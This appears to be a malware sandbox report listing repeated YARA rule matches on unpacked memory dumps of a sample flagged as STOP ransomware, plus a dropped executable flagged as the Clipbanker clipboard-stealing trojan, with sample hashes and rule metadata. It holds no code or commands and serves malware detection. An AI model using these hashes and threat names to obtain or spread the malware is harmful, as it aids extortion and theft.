Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.0.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.0.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.2.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
